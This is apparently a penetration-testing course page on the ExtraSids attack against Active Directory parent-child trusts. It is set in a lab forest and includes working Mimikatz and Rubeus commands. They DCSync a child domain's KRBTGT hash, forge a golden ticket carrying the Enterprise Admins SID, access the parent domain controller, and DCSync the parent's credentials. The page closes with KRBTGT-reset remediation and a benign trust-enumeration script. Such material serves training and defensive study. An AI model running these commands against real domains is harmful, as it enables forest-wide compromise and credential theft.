
Attacking Domain Trusts — Child -> Parent (from Windows)

Once a child domain is compromised, the parent domain can be taken over with the ExtraSids attack. It works because SID Filtering is not enabled by default on intra-forest trusts (parent-child and tree-root): SIDs carried in the sidHistory attribute, or injected into the PAC as ExtraSids, are honored by the parent domain's domain controllers.

SID History Primer

The sidHistory attribute preserves a user’s original SID during domain migrations so they can still access resources in the old domain. All SIDs in sidHistory are added to the user’s token at logon.

An attacker can inject the SID of a privileged group (e.g., Enterprise Admins) into sidHistory on an account they control. This grants those privileges without being an actual member of the group.

Implications:

  • DCSync against the parent domain
  • Golden Ticket creation for forest-wide persistence
  • Full administrative access to the entire forest

ExtraSids Attack — Prerequisites

After compromising a child domain, gather:

  • KRBTGT NT hash (child domain): DCSync the child domain's KRBTGT account
  • Child domain SID: Get-DomainSID, or the Object Security ID in the Mimikatz DCSync output with the trailing -502 RID removed
  • Target user name: any name; the account does not need to exist
  • Child domain FQDN: known from enumeration
  • Enterprise Admins SID (parent domain): Get-DomainGroup -Domain <PARENT> -Identity "Enterprise Admins"

The Enterprise Admins group exists only in the forest root domain, and its SID always follows the pattern <parent-domain-SID>-519 (RID 519 is well known, so the SID can be derived from the parent domain SID alone).

Gathering the Data

1. KRBTGT Hash (Child Domain)

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt

The Credentials section of the output yields the NT hash (e.g., 9d765b482771505cbe97411065964d5f). The Object Security ID line shows the krbtgt object SID, which is the child domain SID with the RID -502 appended; strip that last component to get the domain SID.

2. Child Domain SID

Get-DomainSID

3. Enterprise Admins SID (Parent Domain)

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

Or with built-in tools:

Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"

ExtraSids Attack — Mimikatz

Create a Golden Ticket in the child domain with an extra SID for Enterprise Admins in the parent domain:

mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
  • /user: any username (can be fake)
  • /domain: child domain FQDN
  • /sid: child domain SID
  • /krbtgt: child domain KRBTGT NT hash
  • /sids: Enterprise Admins SID from the parent domain (placed in the PAC as an ExtraSid)
  • /ptt: pass-the-ticket (inject into the current session)

Verify the ticket is loaded:

klist

Test access to the parent domain DC:

ls \\academy-ea-dc01.inlanefreight.local\c$

ExtraSids Attack — Rubeus

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
  • /rc4: child domain KRBTGT NT hash
  • /domain: child domain FQDN
  • /sid: child domain SID
  • /sids: Enterprise Admins SID from the parent domain
  • /user: any username (can be fake)
  • /ptt: pass-the-ticket

Post-Exploitation: DCSync the Parent Domain

With the Golden Ticket loaded, perform DCSync against the parent domain:

mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm

Mimikatz picks the domain controller from the current session's domain by default, so when the target account lives in a domain other than the one you are logged into, specify the target domain explicitly or the request goes to the wrong DC:

mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL

Why This Works

  • Within the same AD forest, sidHistory is respected (no SID Filtering on intra-forest trusts)
  • The Golden Ticket includes the Enterprise Admins SID as an ExtraSID in the PAC
  • The parent domain DC treats the ticket holder as a member of Enterprise Admins
  • Enterprise Admins has administrative access to every domain in the forest

Invalidation

The only way to invalidate Golden Tickets is to change the KRBTGT account password, twice, because AD keeps the previous KRBTGT key and still accepts tickets encrypted with it. Allow replication to complete between the two resets, and expect all outstanding TGTs to become invalid after the second one. Do this periodically and always after a penetration test in which domain compromise was achieved. If the parent domain was DCSynced, its KRBTGT needs the same treatment, since the parent's hash is enough to forge forest-wide tickets without the child at all.

Key Takeaways

  • Compromising any child domain in a forest = compromising the entire forest
  • The target user in the Golden Ticket does not need to exist
  • SID Filtering protects against this across external/forest trusts, but not within the same forest
  • Always check for parent-child trust relationships — they are the escalation path from child domain admin to Enterprise Admin
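Checking which trusts actually honor sidHistory is a quick query, so here is an added example (not code from the original page) that lists the current domain's trusts and flags the ones an ExtraSids ticket can cross. It assumes the RSAT ActiveDirectory module (Get-ADTrust) is available; the bit values are the documented trustAttributes flags, and the function name Get-SidHistoryExposure is this example's own.

```powershell
# Added example, not code from the original page: list the trusts of the current
# domain and flag those an ExtraSids ticket can cross, i.e. where sidHistory is
# honored. Requires the RSAT ActiveDirectory module (Get-ADTrust); the bit values
# are the documented trustAttributes flags.
Import-Module ActiveDirectory

$TRUST_ATTRIBUTE_QUARANTINED_DOMAIN = 0x04   # SID filtering quarantine enabled
$TRUST_ATTRIBUTE_FOREST_TRANSITIVE  = 0x08   # forest trust
$TRUST_ATTRIBUTE_WITHIN_FOREST      = 0x20   # parent-child or tree-root trust

# Hypothetical helper name; returns one object per trust with the decoded flags.
function Get-SidHistoryExposure {
    Get-ADTrust -Filter * | ForEach-Object {
        $attrs        = [int]$_.TrustAttributes
        $withinForest = ($attrs -band $TRUST_ATTRIBUTE_WITHIN_FOREST) -ne 0
        $quarantined  = ($attrs -band $TRUST_ATTRIBUTE_QUARANTINED_DOMAIN) -ne 0
        $forestTrust  = ($attrs -band $TRUST_ATTRIBUTE_FOREST_TRANSITIVE) -ne 0
        [pscustomobject]@{
            Source          = $_.Source
            Target          = $_.Target
            Direction       = $_.Direction
            TrustAttributes = ('0x{0:X}' -f $attrs)
            WithinForest    = $withinForest
            ForestTrust     = $forestTrust
            Quarantined     = $quarantined
            # Intra-forest trusts honor sidHistory unless someone explicitly
            # quarantined them, which Microsoft does not support and is rarely done.
            # Forest and external trusts are SID-filtered by default.
            SidHistoryHonored = $withinForest -and -not $quarantined
        }
    }
}

Get-SidHistoryExposure | Format-Table -AutoSize
```

Run it from the compromised child domain: the parent-child trust shows up with the parent's FQDN as Target, WithinForest set and SidHistoryHonored true, which is exactly the condition the attack above relies on. A forest trust to another forest appears with ForestTrust set and SidHistoryHonored false, matching the takeaway that SID Filtering blocks this path across forest boundaries.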